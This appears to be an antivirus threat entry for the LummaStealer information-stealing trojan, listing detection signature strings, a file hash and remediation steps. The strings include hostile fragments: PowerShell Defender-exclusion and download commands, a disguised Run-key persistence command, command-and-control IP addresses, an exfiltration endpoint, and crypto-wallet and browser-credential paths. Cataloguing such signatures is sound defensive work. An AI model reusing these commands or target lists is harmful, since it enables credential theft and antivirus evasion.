Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 32-bit Windows platform, family LummaStealer
Trojan:Win32/LummaStealer!MTB is a sophisticated information-stealing malware detected via behavioral analysis. It targets sensitive data such as browser credentials (encrypted keys), system information, and may use silent installation and persistence mechanisms. Exfiltrated data is often sent to external services like TEXTBIN.NET.
Relevant strings associated with this threat: - os_crypt.encrypted_key (PEHSTR_EXT) - B.imports (PEHSTR_EXT) - os_c576xedrypt.encry576xedpted_key (PEHSTR_EXT) - Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (PEHSTR_EXT) - fyi/Blogtion.msi (PEHSTR_EXT) - ppCmdLine=/QN /norestart (PEHSTR_EXT) - atomic.QSY_zrh (PEHSTR_EXT) - - Screen Resoluton: (PEHSTR_EXT) - TEXTBIN.NET/raw (PEHSTR_EXT) - /VERYSILENT /SP- (PEHSTR_EXT) - aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources (PEHSTR_EXT) - dKAoMzVdoGMRAuUpnzHLYIx.dll (PEHSTR_EXT) - bFISQFXZrlhowSppjMcUMEWMVO.dll (PEHSTR_EXT) - sxWsBcgMSxRdUCKXevfJKgAGAKoM.dll (PEHSTR_EXT) - qIadkkJWSlcNQdQofhpMzxrd.dll (PEHSTR_EXT) - LsVgHFhAfthrvrwvVQnXVYBStlK.dll (PEHSTR_EXT) - thoseintroductory.exe (PEHSTR_EXT) - callcustomerpro.exe (PEHSTR_EXT) - Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR_EXT) - GPUView.pdb (PEHSTR_EXT) - error_correction_update_check.My.Resources (PEHSTR_EXT) - installation_solution_for_use.My.Resources (PEHSTR_EXT) - .vuia3 (PEHSTR_EXT) - writerfunctionpro.exe (PEHSTR_EXT) - timeprogrammer.exe (PEHSTR_EXT) - DelNodeRunDLL32 (PEHSTR_EXT) - load_world.exe (PEHSTR_EXT) - live_stream_from_cosmos_events_app.exe (PEHSTR_EXT) - Account/Login (PEHSTR_EXT) - WebMatrix.WebData.Resources.WebDataResources (PEHSTR_EXT) - LoaderV1.Form1.resources (PEHSTR_EXT) - oFYSVYzChxVsXWmRsYqu.dll (PEHSTR_EXT) - tzYslkEExBzhWQjYATHOe.dll (PEHSTR_EXT) - OdZokoKlJenvDbhTg.dll (PEHSTR_EXT) - HeWSfFWuFmmMEQy.dll (PEHSTR_EXT) - ILLnogZyZLUtVXiOvwRHpTewBNs.dll (PEHSTR_EXT) - VioletRichPlayer364David.ZODvl (PEHSTR_EXT) - Revolutionizing connectivity with cutting-edge cloud solutions. (PEHSTR_EXT) - OergBcaAGPSxGICMDFJxnj (PEHSTR_EXT) - Leading the future of integrated technology solutions. (PEHSTR_EXT) - main.RedirectToPayload (PEHSTR_EXT) - main.LoadPEModule (PEHSTR_EXT) - main.GetNTHdrs (PEHSTR_EXT) - main.AllocPEBuffer (PEHSTR_EXT) - main.PERawToVirtual (PEHSTR_EXT) - main.CreateSuspendedProcess (PEHSTR_EXT) - main._LoadPEModule (PEHSTR_EXT) - main.Resume_Thread (PEHSTR_EXT) - main.Write_ProcessMemory (PEHSTR_EXT) - main.Get_ThreadContext (PEHSTR_EXT) - Intel Core Inc. Trademark (PEHSTR_EXT) - JSylCAgIufPyrE (PEHSTR_EXT) - <HTA:APPLICATION icon="#" WINDOWSTATE="normal" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" BORDER="none" SCROLL="no" (PEHSTR_EXT) - window.close(); (PEHSTR_EXT) - </script> (PEHSTR_EXT) - tLrmzJMsrWOFWmoOxcctAcCafzA.d (PEHSTR_EXT) - FgLHhdSuJHOQcVWHZfF.d (PEHSTR_EXT) - main.Md5Encode (PEHSTR_EXT) - main.EUkcKYTIDb (PEHSTR_EXT) - main.TerminateProcess (PEHSTR_EXT) - main.nlZMziDMqv (PEHSTR_EXT) - main.ResumeThread (PEHSTR_EXT) - main.WriteProcessMemory (PEHSTR_EXT) - main.Wow64SetThreadContext (PEHSTR_EXT) - main.GetThreadContext (PEHSTR_EXT) - LwNOrAxUVY/main.go (PEHSTR_EXT) - main.nwPXANdvbL (PEHSTR_EXT) - main.qWwvfeKaCT (PEHSTR_EXT) - JustABackDoor\obj\Debug\JustABackDoor.pdb (PEHSTR_EXT) - JustABackDoor.Executor (PEHSTR_EXT) - RunPowerShellCommand (PEHSTR_EXT) - debug.g.resources (PEHSTR_EXT) - psicologiaecultura.com.br (PEHSTR_EXT) - if ($exeName -eq "RSGame.exe") (PEHSTR_EXT) - main.UlhMFyDdoz (PEHSTR_EXT) - main.AEKCihaLRV (PEHSTR_EXT) - main.uydiOYgQCH.deferwrap2 (PEHSTR_EXT) - main.uydiOYgQCH.deferwrap1 (PEHSTR_EXT) - main.mOaSjsgDny.func1.Print.1 (PEHSTR_EXT) - test_lib/main.go (PEHSTR_EXT) - main.qHbLKcVFPY (PEHSTR_EXT) - main.BnMWnpUycO (PEHSTR_EXT) - main.HFdrQcLRTh (PEHSTR_EXT) - main.HwNcTblZxJ (PEHSTR_EXT) - main.khgzBwOcdS (PEHSTR_EXT) - main.RDF (PEHSTR_EXT) - main.cFVvJaclpr (PEHSTR_EXT) - main.oepNeSmKgT (PEHSTR_EXT) - main.cQPubDNZNj (PEHSTR_EXT) - main.neJDPbLRWD (PEHSTR_EXT) - main.VZCOQzehCp (PEHSTR_EXT) - main.WjLRMuNaor (PEHSTR_EXT) - main.EFTcmUgEtT (PEHSTR_EXT) - main.faqLSRWRlV (PEHSTR_EXT) - main.lnejYwfZkm (PEHSTR_EXT) - main.iiQhNBnnfo (PEHSTR_EXT) - main.opWGippTfg.deferwrap2 (PEHSTR_EXT) - main.opWGippTfg.deferwrap1 (PEHSTR_EXT) - main.KqqAVmjanJ (PEHSTR_EXT) - main.fQyfTGPUtq (PEHSTR_EXT) - exithook/hooks.go (PEHSTR_EXT) - main.randSeq (PEHSTR_EXT) - main.KwPMHzDibl (PEHSTR_EXT) - main._Cfunc_wrf (PEHSTR_EXT) - main._RunPE (PEHSTR_EXT) - main. (PEHSTR_EXT) - .deferwrap2 (PEHSTR_EXT) - .deferwrap1 (PEHSTR_EXT) - .func1 (PEHSTR_EXT) - .func2 (PEHSTR_EXT) - .func3 (PEHSTR_EXT) - .func4 (PEHSTR_EXT) - .func1.Print.1 (PEHSTR_EXT) - .rsrc (PEHSTR_EXT) - .idata (PEHSTR_EXT) - .rsrc (PEHSTR_EXT) - .func1.Print.func1 (PEHSTR_EXT) - complex integrate build quick sun understand network power fast support (PEHSTR_EXT) - =.M&o (SNID) - database\wirefr\x64\HTTP\Intero.pdb (PEHSTR_EXT) - .text (PEHSTR_EXT) - `.rdata (PEHSTR_EXT) - @.data (PEHSTR_EXT) - .00cfg (PEHSTR_EXT) - @.reloc (PEHSTR_EXT) - B.open (PEHSTR_EXT) - fequal.exe (PEHSTR_EXT) - .taggant (PEHSTR_EXT) - `.rsrc (PEHSTR_EXT) - Wallets/Electrum (PEHSTR_EXT) - Wallets/ElectronCash (PEHSTR_EXT) - %appdata%\com.liberty.jaxx\IndexedDB (PEHSTR_EXT) - wallets/Ethereum (PEHSTR_EXT) - %localappdata%\Coinomi (PEHSTR_EXT) - lid=%s&j=%s&ver=4.0 (PEHSTR_EXT) - TeslaBrowser/5.5 (PEHSTR_EXT) - Screen.png (PEHSTR_EXT) - Screen Resoluton: (PEHSTR_EXT) - POST /api HTTP/1.1 (PEHSTR_EXT) - %appdata%\com.liberty.jaxx (PEHSTR_EXT) - Mail Clients/TheBat (PEHSTR_EXT) - Mail Clients/Pegasus (PEHSTR_EXT) - Applications/Telegram (PEHSTR_EXT) - Applications/1Password (PEHSTR_EXT) - Wallets/Daedalus (PEHSTR_EXT) - appdata\exodus (PEHSTR_EXT) - appdata\binance (PEHSTR_EXT) - get-wmiobject-classwin32_computersystem (PEHSTR_EXT) - webextension@metamask.io (PEHSTR_EXT) - .func6 (PEHSTR_EXT) - .func6.1 (PEHSTR_EXT) - .func5 (PEHSTR_EXT) - .func5.1 (PEHSTR_EXT) - .func4.1 (PEHSTR_EXT) - .func3.1 (PEHSTR_EXT) - .func2.1 (PEHSTR_EXT) - .func8 (PEHSTR_EXT) - .func7 (PEHSTR_EXT) - Software\WinLicense (PEHSTR_EXT) - tsrnKMMRWaSmgIGBadTmRDVK.dll (PEHSTR_EXT) - EMgVkXRBlViHxiKJoGXomDnkozkr.dll (PEHSTR_EXT) - nxtSvXVgJXelyGLBfuddwnihiSLb.dll (PEHSTR_EXT) - wDSDpeHhJZHHlukYvJFvIbzlFEz.dll (PEHSTR_EXT) - QrUrwtPcnxxkwnxalgzJPWVFgTlT.dll (PEHSTR_EXT) - AfSdNM6/46ObIJJmWHHvpVJ (PEHSTR_EXT) - Tm5McYSCxHrGi4S+xs0dRKxy+8/OKxRNXx1SEPQEI804Dz4Y8PunFang (PEHSTR_EXT) - TextForm\obj\Debug\TextForm.pdb (PEHSTR_EXT) - Dwasakj.Properties.Resources (PEHSTR_EXT) - file:/// (PEHSTR_EXT) - main.CocLYFOOoa (PEHSTR_EXT) - main.lFDfigPOFq (PEHSTR_EXT) - main.CONTEXT (PEHSTR_EXT) - main.ISLAdTJUKL (PEHSTR_EXT) - I02Op2e6ZD52OJInVolF/WhWwGUgukvawTLHcS4qp (PEHSTR_EXT) - PWGVuoIBdb/core_injector.go (PEHSTR_EXT) - PWGVuoIBdb/injection.go (PEHSTR_EXT) - Charter.exe (PEHSTR_EXT) - "p": "%appdata%\\Ethereum", (PEHSTR_EXT) - "p": "%appdata%\\Bitcoin\wallets", (PEHSTR_EXT) - "p": "%localappdata%\\Microsoft\\Edge\\User Data", (PEHSTR_EXT) - "z": "Wallets/Bitcoin core", (PEHSTR_EXT) - "z": "Wallets/DashCore", (PEHSTR_EXT) - "n": "chrome.exe", (PEHSTR_EXT) - @.idata (PEHSTR_EXT) - aeblfdkhhhdcdjpifhhbdiojplfjncoa (PEHSTR_EXT) - src\executable_loader.rs (PEHSTR) - WinHttpWriteData (PEHSTR_EXT) - powershell -Command "Add-MpPreference -ExclusionPath (PEHSTR_EXT) - powershell -Command "Invoke-WebRequest -Uri (PEHSTR_EXT) - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT) - C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb (PEHSTR_EXT) - /.exe" -Force (PEHSTR_EXT) - ExecutionPolicyRead after Close (PEHSTR_EXT) - 127.0.0.1:53 (PEHSTR_EXT) - Command (PEHSTR_EXT) - SOFTWARE\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT) - Js) (SNID) - reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AdobeUpdater /t REG_SZ /d "%s" /f (PEHSTR_EXT) - cmd.exe /c (PEHSTR_EXT) - %userappdata%\RestartApp.exe (PEHSTR_EXT) - \\.\Oreans.vxd (PEHSTR_EXT) - .idata (PEHSTR_EXT) - SOFTWARE\WinLicense (PEHSTR_EXT) - /61GM (SNID) - Realtek_HD_Audio_Universal_Service_Driver.exe (PEHSTR_EXT) - -NoProfile -ExecutionPolicy Bypass -Command " (PEHSTR_EXT) - p://141.98.6.130:5554/ (PEHSTR_EXT) - .exe (PEHSTR_EXT) - p://84.21.189.22:5554/ (PEHSTR_EXT) - DownloaderApp.exe (PEHSTR_EXT) - .svG (SNID) - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT) - rundll32 (PEHSTR_EXT) - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT) - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT) - !#HSTR:ExecutionGuardrails (PEHSTR_EXT) - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT) - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT) - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
4a8b1df1313336b9650cab4da715a8cf2910caca7e8d98faed12ce9a8f6538f9Isolate the infected system from the network immediately. Perform a full system scan with updated antivirus software to remove all detected threats. Crucially, change all critical passwords (email, banking, social media, work accounts) after remediation, assuming a credential compromise.